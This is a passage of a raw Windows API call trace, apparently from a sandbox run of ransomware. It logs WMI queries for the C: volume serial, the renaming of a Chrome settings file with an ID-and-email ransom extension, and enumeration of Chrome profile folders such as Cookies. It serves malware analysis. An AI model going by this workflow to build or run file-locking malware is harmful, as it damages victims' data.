ppvObject=0x949e43c*=0x6027800) returned 0x0 [0185.699] WbemLocator:IUnknown:QueryInterface (in: This=0x6027800, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3f8 | out: ppvObject=0x949e3f8*=0x0) returned 0x80004002 [0185.699] WbemLocator:IUnknown:AddRef (This=0x6027800) returned 0x3 [0185.699] WbemLocator:IUnknown:QueryInterface (in: This=0x6027800, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd54 | out: ppvObject=0x949dd54*=0x0) returned 0x80004002 [0185.699] WbemLocator:IUnknown:QueryInterface (in: This=0x6027800, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0185.699] WbemLocator:IUnknown:QueryInterface (in: This=0x6027800, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dd10 | out: ppvObject=0x949dd10*=0x0) returned 0x80004002 [0185.699] CoGetContextToken (in: pToken=0x949dd70 | out: pToken=0x949dd70) returned 0x0 [0185.699] CoGetContextToken (in: pToken=0x949e178 | out: pToken=0x949e178) returned 0x0 [0185.699] WbemLocator:IUnknown:QueryInterface (in: This=0x6027800, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e208 | out: ppvObject=0x949e208*=0x0) returned 0x80004002 [0185.700] WbemLocator:IUnknown:Release (This=0x6027800) returned 0x2 [0185.700] WbemLocator:IUnknown:Release (This=0x6027800) returned 0x1 [0185.700] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0185.700] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0185.700] WbemLocator:IUnknown:QueryInterface (in: This=0x6027800, riid=0x949e818*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x6027800) returned 0x0 [0185.700] WbemLocator:IUnknown:AddRef (This=0x6027800) returned 0x3 [0185.700] WbemLocator:IUnknown:Release (This=0x6027800) returned 0x2 [0185.700] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e80, puCount=0x949e9ac | out: puCount=0x949e9ac*=0x2) returned 0x0 [0185.700] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=8, puBuffLength=0x949e9a8*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a8*=0xf, pszText=0x0) returned 0x0 [0185.700] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=8, puBuffLength=0x949e9a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.700] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e884 | out: ppv=0x949e884*=0x60277a0) returned 0x0 [0185.700] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60277a0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e918 | out: ppNamespace=0x949e918*=0x603310c) returned 0x0 [0186.582] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7b4 | out: ppvObject=0x949e7b4*=0xb5a8c4) returned 0x0 [0186.582] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a8c4, pProxy=0x603310c, pAuthnSvc=0x949e804, pAuthzSvc=0x949e800, pServerPrincName=0x949e7f8, pAuthnLevel=0x949e7fc, pImpLevel=0x949e7ec, pAuthInfo=0x949e7f0, pCapabilites=0x949e7f4 | out: pAuthnSvc=0x949e804*=0xa, pAuthzSvc=0x949e800*=0x0, pServerPrincName=0x949e7f8, pAuthnLevel=0x949e7fc*=0x6, pImpLevel=0x949e7ec*=0x2, pAuthInfo=0x949e7f0, pCapabilites=0x949e7f4*=0x1) returned 0x0 [0186.583] WbemLocator:IUnknown:Release (This=0xb5a8c4) returned 0x1 [0186.583] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7a8 | out: ppvObject=0x949e7a8*=0xb5a8e4) returned 0x0 [0186.583] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7a4 | out: ppvObject=0x949e7a4*=0xb5a8c4) returned 0x0 [0186.583] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a8c4, pProxy=0x603310c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0186.583] WbemLocator:IUnknown:Release (This=0xb5a8c4) returned 0x2 [0186.583] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x1 [0186.583] CoTaskMemFree (pv=0xb59088) [0186.583] WbemLocator:IUnknown:Release (This=0x60277a0) returned 0x0 [0186.583] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3a4 | out: ppvObject=0x949e3a4*=0xb5a8e4) returned 0x0 [0186.583] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e360 | out: ppvObject=0x949e360*=0x0) returned 0x80004002 [0186.584] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e17c | out: ppvObject=0x949e17c*=0x0) returned 0x80004002 [0186.584] WbemLocator:IUnknown:AddRef (This=0xb5a8e4) returned 0x3 [0186.584] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dcbc | out: ppvObject=0x949dcbc*=0x0) returned 0x80004002 [0186.585] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0186.585] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc78 | out: ppvObject=0x949dc78*=0xb5a844) returned 0x0 [0186.585] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a844, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc80 | out: pCid=0x949dc80*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0186.585] WbemLocator:IUnknown:Release (This=0xb5a844) returned 0x3 [0186.585] CoGetContextToken (in: pToken=0x949dcd8 | out: pToken=0x949dcd8) returned 0x0 [0186.585] CoGetContextToken (in: pToken=0x949e0e0 | out: pToken=0x949e0e0) returned 0x0 [0186.585] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e170 | out: ppvObject=0x949e170*=0xb5a8cc) returned 0x0 [0186.585] WbemLocator:IRpcOptions:Query (in: This=0xb5a8cc, pPrx=0xb5a8e4, dwProperty=2, pdwValue=0x949e198 | out: pdwValue=0x949e198) returned 0x80004002 [0186.586] WbemLocator:IUnknown:Release (This=0xb5a8cc) returned 0x3 [0186.586] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x2 [0186.586] CoGetContextToken (in: pToken=0x949e6b8 | out: pToken=0x949e6b8) returned 0x0 [0186.586] CoGetContextToken (in: pToken=0x949e618 | out: pToken=0x949e618) returned 0x0 [0186.586] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x949e6e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e6e4 | out: ppvObject=0x949e6e4*=0x603310c) returned 0x0 [0186.586] WbemLocator:IUnknown:AddRef (This=0x603310c) returned 0x4 [0186.586] WbemLocator:IUnknown:Release (This=0x603310c) returned 0x3 [0186.586] WbemLocator:IUnknown:Release (This=0x603310c) returned 0x2 [0186.586] SysStringLen (param_1=0x0) returned 0x0 [0186.586] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030ef0, puCount=0x949ea7c | out: puCount=0x949ea7c*=0x0) returned 0x0 [0186.586] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=2, puBuffLength=0x949ea78*=0x0, pszText=0x0 | out: puBuffLength=0x949ea78*=0x20, pszText=0x0) returned 0x0 [0186.586] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=2, puBuffLength=0x949ea78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0186.586] CoGetContextToken (in: pToken=0x949e6e8 | out: pToken=0x949e6e8) returned 0x0 [0186.586] WbemLocator:IUnknown:AddRef (This=0xb5a8e4) returned 0x3 [0186.586] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e57c | out: ppvObject=0x949e57c*=0xb5a8e4) returned 0x0 [0186.586] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x3 [0186.586] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x2 [0186.586] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=2, puBuffLength=0x949ea80*=0x0, pszText=0x0 | out: puBuffLength=0x949ea80*=0x20, pszText=0x0) returned 0x0 [0186.586] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=2, puBuffLength=0x949ea80*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea80*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0186.587] IWbemServices:GetObject (in: This=0x603310c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949ea34*=0x0, ppCallResult=0x0 | out: ppObject=0x949ea34*=0x6028648, ppCallResult=0x0) returned 0x0 [0187.826] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e80, puCount=0x949ea34 | out: puCount=0x949ea34*=0x2) returned 0x0 [0187.826] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=4, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0xf, pszText=0x0) returned 0x0 [0187.826] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=4, puBuffLength=0x949ea30*=0xf, pszText="00000000000000" | out: puBuffLength=0x949ea30*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0187.826] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949ea30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3668f50*=0, plFlavor=0x3668f54*=0 | out: pVal=0x949ea30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3668f50*=8, plFlavor=0x3668f54*=0) returned 0x0 [0187.826] SysStringByteLen (bstr="9C354B42") returned 0x10 [0187.826] SysStringByteLen (bstr="9C354B42") returned 0x10 [0187.826] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949ea38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3668f50*=8, plFlavor=0x3668f54*=0 | out: pVal=0x949ea38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3668f50*=8, plFlavor=0x3668f54*=0) returned 0x0 [0187.826] SysStringByteLen (bstr="9C354B42") returned 0x10 [0187.826] SysStringByteLen (bstr="9C354B42") returned 0x10 [0187.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", nBufferLength=0x105, lpBuffer=0x949e638, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", lpFilePart=0x0) returned 0x59 [0187.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e638, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x7c [0187.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea98) returned 1 [0187.827] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), fInfoLevelId=0x0, lpFileInformation=0x949eb14 | out: lpFileInformation=0x949eb14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x28e79120, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0187.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea94) returned 1 [0187.827] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0188.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0188.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports", lpFilePart=0x0) returned 0x54 [0188.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\", lpFilePart=0x0) returned 0x55 [0188.078] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0188.078] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.079] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0188.079] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0188.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0188.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0188.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0188.079] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports", lpFilePart=0x0) returned 0x54 [0188.079] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\", lpFilePart=0x0) returned 0x55 [0188.079] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0188.080] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.080] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0188.080] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0188.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0188.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0188.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0188.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpFilePart=0x0) returned 0x4b [0188.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpFilePart=0x0) returned 0x4c [0188.081] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f190 [0188.700] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.137] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0189.137] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d406e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d406e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d1e730, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0189.137] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d66840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d66840, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d44890, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies-journal", cAlternateFileName="COOKIE~1")) returned 1 [0189.138] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83b08a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x83b08a50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0b57b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, 